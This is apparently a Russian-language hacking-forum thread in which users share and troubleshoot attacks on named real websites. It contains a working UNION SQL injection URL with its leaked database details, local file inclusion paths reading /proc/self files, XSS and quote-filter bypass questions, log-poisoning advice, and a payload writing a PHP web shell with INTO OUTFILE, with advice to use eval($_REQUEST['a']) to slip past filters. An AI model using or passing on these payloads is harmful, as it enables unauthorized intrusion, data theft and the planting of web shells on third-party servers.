http://www.cms.it/prodotti.php?lang=eng&pc=-49+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+--+ 5.0.77-log:cms_it_db_01:cms_it_dba@localhost:redhat-linux-gnu
на этом сайте нашол пару xss _http://shock-world.com/ в полях регистрации email и name но они до ужаса бесполезные. есть кто поможет дальше прокрутить ? потому что я пока ничего ненашол , но уверен есть там дырки
есть сайт с LFI, при чтении /proc/self/environ получается вот что: /proc/self/cmdline link: http://staltorgmoscow.ru/index.php?option=com_canteen&controller=../../../../../../../proc/self/cmdline%00 WTF?oO
Есть xss, выполнить можно только Ну или просто Символы как: Фильтруются. Пробовал по разному, и так: И просто даже все брал в String.fromCharCode. Но все безуспешно. Помогите плиз, правильно составить запрос.
WTF?oO , файлы находящиеся за корнем отличаются от кодировки файлов находящимся в каталоге сайта т е файлы читаются в кодировке, отличной от их изначальной кодировки. Надо искать что то в пределах сайта/на другом сайте, если есть доступ: Code: http://staltorgmoscow.ru/index.php?option=com_canteen&controller=../../../robots.txt%00ddd Так же можно найти путь к логам, и послать в них данные в кодировке, в которой они читаются и выводятся.
Проблема только с чтением данных, которые могут быть изменены клиентом. Code: http://staltorgmoscow.ru/index.php?option=com_canteen&controller=../../../../../../../proc/self/status%00ddd Проще в хостинге зарегаться и посмотреть где логи лежат.
Помогите разобраться вот с этой скулёй. Code: http://www.biogov.gc.ca/english/LinkSearch.asp?x=732&formAction=keywordsearch&txtSearchKeywords=13\ Мож есть статья как крутить при алертах
Пробовал. Вывода не нашёл. Также пробовал через подзапрос Code: http://www.biogov.gc.ca/english/view.asp?x=551&mid=135+and+1=1+union+select+1 Так же болт.
Фильтруется кавычка, как здесь это обойти. В интернете искал, но по этому вопросу ничего не нашел. http://www.cityadm.magadan.ru/index.php?cstart=4'+order+by+1+--+&do=cat&category=kotirovka
?id=-512+UnIoN+AlL+sElEcT+1,2,'<?system($_GET[cmd]);?>',4,5,6,7,8+INTO+OUTFILE+'/web3/vhosts/webhosting/news/php.php'-- выдает Bad Request что можно сделать?
сервер ругается, вероятнее на слово $_GET или систем, подставь разные слова/функции смотри что конкретно фильтрует пробуй eval($_REQUEST['a']), ну или как то так, в основном именно они не попадают под фильтр --- да и вообще нах юзать system?
Konqi спасибо, я так понял можно записать любой код, буду пробовать. Вот ещё проблема http://www.trommeslageren.dk/index2.php?id='0 ни могу подобрать поля http://www.trommeslageren.dk/index2.php?id=-10+union+select+null,null.. ни чего не меняется что тогда делать?
